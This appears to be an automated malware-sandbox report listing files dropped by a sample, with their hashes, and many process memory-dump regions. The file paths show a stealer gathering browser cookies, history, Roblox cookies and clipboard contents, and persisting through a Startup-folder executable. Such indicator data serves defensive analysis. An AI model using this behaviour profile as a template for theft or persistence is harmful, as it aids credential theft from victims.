Filesize
174KB

MD5
6860932c8517215feff74e664b230598

SHA1
7858f8e3ffe71c2d16ca06762b0d0ea44a707123

SHA256
490a654a437cbf62a89ba102087388382230e6796f89db11a8a2f4a1598aa20b

SHA512
4d788b5944837117bb96871e7c0783ea38b40ac7de5fba2c6e512468b8a6568b0648c03f264d62c4810fbef853712cf7bbfc805fca7ce3d5c9a2d22d81be69b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2en3ofxl.l4i.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cB7zLMoQJY\Browser\cookies.txt
Filesize
49B

MD5
357c18b5c470aa5214819ed2e11882f9

SHA1
262726528ac6ece5ef69b48cbf69e9d3c79bbc2d

SHA256
e04233c3a65810f382471c2c1484cc71df6f2078d56bd91f478ed99790ac11f5

SHA512
a84eaa0f8466ef145e765b3c340120a7947aad6ded63c301be5a5c4dea15f603ae0a295c8d7d9828a8f660edfa058edf96abc6950eebbbafe3af402a4b37d683

Download Submit
C:\Users\Admin\AppData\Local\Temp\cB7zLMoQJY\Browser\history.txt
Filesize
334B

MD5
e060edee56198ef547ad27bc5bd056b1

SHA1
da14774f0fcc3ca7ff458093df880ae96133e454

SHA256
594551bd53fe334366914b0d7f2a5be335bad0b9454edc96e3c6b76ecb6ada49

SHA512
08b9934d6691323bfcfe21ec8e79a8cea9404584eda4d8a450c3969bd820433ac2ffae70e31604719fbb163d1891c69649c894b7c35bdb0386a17445096d6232

Download Submit
C:\Users\Admin\AppData\Local\Temp\cB7zLMoQJY\Browser\roblox cookies.txt
Filesize
23B

MD5
de9ec9fc7c87635cb91e05c792e94140

SHA1
3f0fbeaff23a30040e5f52b78b474e7cb23488ab

SHA256
aac2a87a65cbbe472000734bd6db5c76f0ffed78e80928f575d5573f3ac94d0f

SHA512
a18ff0f277d880cf249fe7ef20fa026fd8126121fbb6f1de33d3d4a08d37084c662724053c6e8e2035aa7c347000e14a9c12698017ac72b327db6473d6e4af56

Download Submit
C:\Users\Admin\AppData\Local\Temp\cB7zLMoQJY\Clipboard\clipboard.txt
Filesize
18B

MD5
3f86226eca1b8b351d9c5b11dcdbcdfa

SHA1
576f70164e26ad8dbdb346cd72c26323f10059ac

SHA256
0d50f046634b25bcfc3ffb0a9feff8ab43e662c8872df933cb15b68050a5bb8c

SHA512
150d95510e0f83ef0e416e1a18663a70f85ff4d09c620fcf355b18df3e939d232054a5be5bbb1b22e050167e61c243d7e89e13c0770cfedbae49b1b8e10d8753

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe
Filesize
17.0MB

MD5
1b21a414863721530990675bbdf9174c

SHA1
612bde6d1da0f1689a6b83a5a38d8e8af9f74aea

SHA256
50b16777f56b4f34dc61001611587a3a9885764c24205eaf82a2a7a45ac9e9e2

SHA512
c448cad9e6028e99b0b4d80877f61d367bb0c943f4c44e045fd81241e57cb43dbd83390a32c5aa99cdb80657f708aba8f92a6f1a7a68e83933c9a2cf92123ba2

Download Submit
C:\Users\Admin\tmp\k3RAKDxeWDttUa
Filesize
20KB

MD5
42c395b8db48b6ce3d34c301d1eba9d5

SHA1
b7cfa3de344814bec105391663c0df4a74310996

SHA256
5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

SHA512
7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

Download Submit
memory/2632-547-0x00007FFCCC6D0000-0x00007FFCCC6FD000-memory.dmp

Filesize
180KB

Download
memory/2632-546-0x00007FFCCC700000-0x00007FFCCC719000-memory.dmp

Filesize
100KB

Download
memory/2632-544-0x00007FFCD06B0000-0x00007FFCD06D4000-memory.dmp

Filesize
144KB

Download
memory/2632-545-0x00007FFCD06A0000-0x00007FFCD06AF000-memory.dmp

Filesize
60KB

Download
memory/2632-543-0x00007FFCBB020000-0x00007FFCBB48E000-memory.dmp

Filesize
4.4MB

Download
memory/2632-549-0x00007FFCD05F0000-0x00007FFCD05FD000-memory.dmp

Filesize
52KB

Download
memory/2632-616-0x00007FFCCBBA0000-0x00007FFCCBBCE000-memory.dmp

Filesize
184KB

Download
memory/2632-604-0x00007FFCBB020000-0x00007FFCBB48E000-memory.dmp

Filesize
4.4MB

Download
memory/2632-548-0x00007FFCCC6B0000-0x00007FFCCC6C9000-memory.dmp

Filesize
100KB

Download
memory/2632-550-0x00007FFCCC330000-0x00007FFCCC364000-memory.dmp

Filesize
208KB

Download
memory/2632-551-0x00007FFCCD180000-0x00007FFCCD18D000-memory.dmp

Filesize
52KB

Download
memory/4124-247-0x000001DCAB9F0000-0x000001DCABA12000-memory.dmp

Filesize
136KB

Download
memory/5396-217-0x00007FFCB9EE0000-0x00007FFCB9F06000-memory.dmp

Filesize
152KB

Download
memory/5396-363-0x00007FFCB9EE0000-0x00007FFCB9F06000-memory.dmp

Filesize
152KB

Download
memory/5396-182-0x00007FFCBAED0000-0x00007FFCBAF57000-memory.dmp

Filesize
540KB

Download
memory/5396-190-0x00007FFCCC220000-0x00007FFCCC22B000-memory.dmp

Filesize
44KB

Download
memory/5396-195-0x00007FFCB9DC0000-0x00007FFCB9ED8000-memory.dmp

Filesize
1.1MB

Download
memory/5396-194-0x00007FFCBAF60000-0x00007FFCBB018000-memory.dmp

Filesize
736KB

Download
memory/5396-193-0x00007FFCBBD60000-0x00007FFCBBD8E000-memory.dmp

Filesize
184KB

Download
memory/5396-192-0x00007FFCB9EE0000-0x00007FFCB9F06000-memory.dmp

Filesize
152KB

Download
memory/5396-200-0x00007FFCCBC80000-0x00007FFCCBC8B000-memory.dmp

Filesize
44KB

Download
memory/5396-199-0x00007FFCB9D80000-0x00007FFCB9DB8000-memory.dmp

Filesize
224KB

Download
memory/5396-198-0x0000018652410000-0x0000018652785000-memory.dmp

Filesize
3.5MB

Download
memory/5396-206-0x00007FFCBAEC0000-0x00007FFCBAECB000-memory.dmp

Filesize
44KB

Download
memory/5396-205-0x00007FFCBBA50000-0x00007FFCBBA5C000-memory.dmp

Filesize
48KB

Download
memory/5396-204-0x00007FFCBD2C0000-0x00007FFCBD2CB000-memory.dmp

Filesize
44KB

Download
memory/5396-203-0x00007FFCBD6E0000-0x00007FFCBD6EC000-memory.dmp

Filesize
48KB

Download
memory/5396-202-0x00007FFCCB960000-0x00007FFCCB96B000-memory.dmp

Filesize
44KB

Download
memory/5396-201-0x00007FFCBBD20000-0x00007FFCBBD3F000-memory.dmp

Filesize
124KB

Download
memory/5396-197-0x00007FFCBA090000-0x00007FFCBA405000-memory.dmp

Filesize
3.5MB

Download
memory/5396-188-0x00007FFCCB720000-0x00007FFCCB739000-memory.dmp

Filesize
100KB

Download
memory/5396-208-0x00007FFCB9D70000-0x00007FFCB9D7C000-memory.dmp

Filesize
48KB

Download
memory/5396-212-0x00007FFCB9D30000-0x00007FFCB9D3B000-memory.dmp

Filesize
44KB

Download
memory/5396-211-0x00007FFCB9D40000-0x00007FFCB9D4C000-memory.dmp

Filesize
48KB

Download
memory/5396-210-0x00007FFCB9D50000-0x00007FFCB9D5E000-memory.dmp

Filesize
56KB

Download
memory/5396-209-0x00007FFCB9D60000-0x00007FFCB9D6C000-memory.dmp

Filesize
48KB

Download
memory/5396-207-0x00007FFCB9F10000-0x00007FFCBA081000-memory.dmp

Filesize
1.4MB

Download
memory/5396-216-0x00007FFCBBA60000-0x00007FFCBBA74000-memory.dmp

Filesize
80KB

Download
memory/5396-215-0x00007FFCB9D00000-0x00007FFCB9D0C000-memory.dmp

Filesize
48KB

Download
memory/5396-214-0x00007FFCB9D10000-0x00007FFCB9D1C000-memory.dmp

Filesize
48KB

Download
memory/5396-213-0x00007FFCB9D20000-0x00007FFCB9D2B000-memory.dmp

Filesize
44KB

Download
memory/5396-218-0x00007FFCB9CF0000-0x00007FFCB9CFD000-memory.dmp

Filesize
52KB

Download
memory/5396-179-0x00007FFCBBD00000-0x00007FFCBBD18000-memory.dmp

Filesize
96KB

Download
memory/5396-219-0x00007FFCB9CD0000-0x00007FFCB9CE2000-memory.dmp

Filesize
72KB

Download
memory/5396-221-0x00007FFCB9CC0000-0x00007FFCB9CCC000-memory.dmp

Filesize
48KB

Download
memory/5396-220-0x00007FFCB9DC0000-0x00007FFCB9ED8000-memory.dmp

Filesize
1.1MB

Download
memory/5396-223-0x00007FFCB9A70000-0x00007FFCB9CB5000-memory.dmp

Filesize
2.3MB

Download
memory/5396-222-0x00007FFCB9D80000-0x00007FFCB9DB8000-memory.dmp

Filesize
224KB

Download
memory/5396-225-0x00007FFCB9A30000-0x00007FFCB9A59000-memory.dmp

Filesize
164KB

Download
memory/5396-224-0x00007FFCB9A60000-0x00007FFCB9A6A000-memory.dmp

Filesize
40KB

Download
memory/5396-174-0x00007FFCBB020000-0x00007FFCBB48E000-memory.dmp

Filesize
4.4MB

Download
memory/5396-175-0x00007FFCBBD20000-0x00007FFCBBD3F000-memory.dmp

Filesize
124KB

Download
memory/5396-176-0x00007FFCB9F10000-0x00007FFCBA081000-memory.dmp

Filesize
1.4MB

Download
memory/5396-333-0x00007FFCB9D30000-0x00007FFCB9D3B000-memory.dmp

Filesize
44KB

Download
memory/5396-326-0x00007FFCB9F10000-0x00007FFCBA081000-memory.dmp

Filesize
1.4MB

Download
memory/5396-322-0x00007FFCBA090000-0x00007FFCBA405000-memory.dmp

Filesize
3.5MB

Download
memory/5396-321-0x00007FFCBAF60000-0x00007FFCBB018000-memory.dmp

Filesize
736KB

Download
memory/5396-320-0x00007FFCBBD60000-0x00007FFCBBD8E000-memory.dmp

Filesize
184KB

Download
memory/5396-316-0x00007FFCCC5E0000-0x00007FFCCC5ED000-memory.dmp

Filesize
52KB

Download
memory/5396-309-0x00007FFCBBF20000-0x00007FFCBBF44000-memory.dmp

Filesize
144KB

Download
memory/5396-308-0x00007FFCBB020000-0x00007FFCBB48E000-memory.dmp

Filesize
4.4MB

Download
memory/5396-325-0x00007FFCBBD20000-0x00007FFCBBD3F000-memory.dmp

Filesize
124KB

Download
memory/5396-336-0x00007FFCD15F0000-0x00007FFCD15FF000-memory.dmp

Filesize
60KB

Download
memory/5396-347-0x00007FFCBBEB0000-0x00007FFCBBEE4000-memory.dmp

Filesize
208KB

Download
memory/5396-369-0x00007FFCBAF60000-0x00007FFCBB018000-memory.dmp

Filesize
736KB

Download
memory/5396-368-0x00007FFCCCFF0000-0x00007FFCCCFFF000-memory.dmp

Filesize
60KB

Download
memory/5396-370-0x00007FFCCBC80000-0x00007FFCCBC8B000-memory.dmp

Filesize
44KB

Download
memory/5396-367-0x00007FFCBBF20000-0x00007FFCBBF44000-memory.dmp

Filesize
144KB

Download
memory/5396-364-0x00007FFCB9DC0000-0x00007FFCB9ED8000-memory.dmp

Filesize
1.1MB

Download
memory/5396-184-0x00007FFCBBA60000-0x00007FFCBBA74000-memory.dmp

Filesize
80KB

Download
memory/5396-362-0x00007FFCCC220000-0x00007FFCCC22B000-memory.dmp

Filesize
44KB

Download
memory/5396-361-0x00007FFCBBA60000-0x00007FFCBBA74000-memory.dmp

Filesize
80KB

Download
memory/5396-360-0x00007FFCBAED0000-0x00007FFCBAF57000-memory.dmp

Filesize
540KB

Download
memory/5396-359-0x00007FFCBBD00000-0x00007FFCBBD18000-memory.dmp

Filesize
96KB

Download
memory/5396-357-0x00007FFCBBD20000-0x00007FFCBBD3F000-memory.dmp

Filesize
124KB

Download
memory/5396-354-0x00007FFCBA090000-0x00007FFCBA405000-memory.dmp

Filesize
3.5MB

Download
memory/5396-356-0x00007FFCCC300000-0x00007FFCCC310000-memory.dmp

Filesize
64KB

Download
memory/5396-355-0x00007FFCBBD40000-0x00007FFCBBD55000-memory.dmp

Filesize
84KB

Download
memory/5396-350-0x00007FFCBBDC0000-0x00007FFCBBE7C000-memory.dmp

Filesize
752KB

Download
memory/5396-352-0x00007FFCBBD60000-0x00007FFCBBD8E000-memory.dmp

Filesize
184KB

Download
memory/5396-351-0x00007FFCBBD90000-0x00007FFCBBDBB000-memory.dmp

Filesize
172KB

Download
memory/5396-387-0x00007FFCB9CC0000-0x00007FFCB9CCC000-memory.dmp

Filesize
48KB

Download
memory/5396-390-0x00007FFCB9A30000-0x00007FFCB9A59000-memory.dmp

Filesize
164KB

Download
memory/5396-389-0x00007FFCB9A60000-0x00007FFCB9A6A000-memory.dmp

Filesize
40KB

Download
memory/5396-388-0x00007FFCB9A70000-0x00007FFCB9CB5000-memory.dmp

Filesize
2.3MB

Download
memory/5396-386-0x00007FFCB9CD0000-0x00007FFCB9CE2000-memory.dmp

Filesize
72KB

Download
memory/5396-385-0x00007FFCB9CF0000-0x00007FFCB9CFD000-memory.dmp

Filesize
52KB

Download
memory/5396-384-0x00007FFCB9D10000-0x00007FFCB9D1C000-memory.dmp

Filesize
48KB

Download
memory/5396-383-0x00007FFCB9D20000-0x00007FFCB9D2B000-memory.dmp

Filesize
44KB

Download
memory/5396-382-0x00007FFCB9D30000-0x00007FFCB9D3B000-memory.dmp

Filesize
44KB

Download
memory/5396-381-0x00007FFCB9D40000-0x00007FFCB9D4C000-memory.dmp

Filesize
48KB

Download
memory/5396-380-0x00007FFCB9D50000-0x00007FFCB9D5E000-memory.dmp

Filesize
56KB

Download
memory/5396-379-0x00007FFCB9D60000-0x00007FFCB9D6C000-memory.dmp

Filesize
48KB

Download
memory/5396-378-0x00007FFCB9D70000-0x00007FFCB9D7C000-memory.dmp

Filesize
48KB

Download
memory/5396-377-0x00007FFCBAEC0000-0x00007FFCBAECB000-memory.dmp

Filesize
44KB

Download
memory/5396-376-0x00007FFCBBA50000-0x00007FFCBBA5C000-memory.dmp

Filesize
48KB

Download
memory/5396-375-0x00007FFCBD2C0000-0x00007FFCBD2CB000-memory.dmp

Filesize
44KB

Download
memory/5396-374-0x00007FFCBD6E0000-0x00007FFCBD6EC000-memory.dmp

Filesize
48KB

Download
memory/5396-373-0x00007FFCCB960000-0x00007FFCCB96B000-memory.dmp

Filesize
44KB

Download
memory/5396-372-0x00007FFCB9D80000-0x00007FFCB9DB8000-memory.dmp

Filesize
224KB

Download
memory/5396-371-0x00007FFCB9D00000-0x00007FFCB9D0C000-memory.dmp

Filesize
48KB

Download
memory/5396-345-0x00007FFCCB720000-0x00007FFCCB739000-memory.dmp

Filesize
100KB

Download
memory/5396-349-0x00007FFCBBE80000-0x00007FFCBBEAE000-memory.dmp

Filesize
184KB

Download
memory/5396-348-0x00007FFCCC5E0000-0x00007FFCCC5ED000-memory.dmp

Filesize
52KB

Download
memory/5396-346-0x00007FFCCC740000-0x00007FFCCC74D000-memory.dmp

Filesize
52KB

Download
memory/5396-343-0x00007FFCCB910000-0x00007FFCCB929000-memory.dmp

Filesize
100KB

Download
memory/5396-340-0x00007FFCBB020000-0x00007FFCBB48E000-memory.dmp

Filesize
4.4MB

Download
memory/5396-366-0x00007FFCBBEF0000-0x00007FFCBBF1D000-memory.dmp

Filesize
180KB

Download
memory/5396-365-0x00007FFCD15F0000-0x00007FFCD15FF000-memory.dmp

Filesize
60KB

Download
memory/5396-358-0x00007FFCB9F10000-0x00007FFCBA081000-memory.dmp

Filesize
1.4MB

Download
memory/5396-170-0x00007FFCBBD40000-0x00007FFCBBD55000-memory.dmp

Filesize
84KB

Download
memory/5396-171-0x00007FFCCC300000-0x00007FFCCC310000-memory.dmp

Filesize
64KB

Download
memory/5396-166-0x00007FFCBA090000-0x00007FFCBA405000-memory.dmp

Filesize
3.5MB

Download
memory/5396-167-0x0000018652410000-0x0000018652785000-memory.dmp

Filesize
3.5MB

Download
memory/5396-162-0x00007FFCBBD60000-0x00007FFCBBD8E000-memory.dmp

Filesize
184KB

Download
memory/5396-163-0x00007FFCBAF60000-0x00007FFCBB018000-memory.dmp

Filesize
736KB

Download
memory/5396-153-0x00007FFCCB720000-0x00007FFCCB739000-memory.dmp

Filesize
100KB

Download
memory/5396-155-0x00007FFCBBEB0000-0x00007FFCBBEE4000-memory.dmp

Filesize
208KB

Download
memory/5396-156-0x00007FFCCC5E0000-0x00007FFCCC5ED000-memory.dmp

Filesize
52KB

Download
memory/5396-157-0x00007FFCBBE80000-0x00007FFCBBEAE000-memory.dmp

Filesize
184KB

Download
memory/5396-158-0x00007FFCBBDC0000-0x00007FFCBBE7C000-memory.dmp

Filesize
752KB

Download
memory/5396-159-0x00007FFCBBD90000-0x00007FFCBBDBB000-memory.dmp

Filesize
172KB

Download
memory/5396-154-0x00007FFCCC740000-0x00007FFCCC74D000-memory.dmp

Filesize
52KB

Download
memory/5396-122-0x00007FFCCB910000-0x00007FFCCB929000-memory.dmp

Filesize
100KB

Download
memory/5396-123-0x00007FFCBBEF0000-0x00007FFCBBF1D000-memory.dmp

Filesize
180KB

Download
memory/5396-117-0x00007FFCBBF20000-0x00007FFCBBF44000-memory.dmp

Filesize
144KB

Download
memory/5396-118-0x00007FFCCCFF0000-0x00007FFCCCFFF000-memory.dmp

Filesize
60KB

Download
memory/5396-107-0x00007FFCBB020000-0x00007FFCBB48E000-memory.dmp

Filesize
4.4MB

Download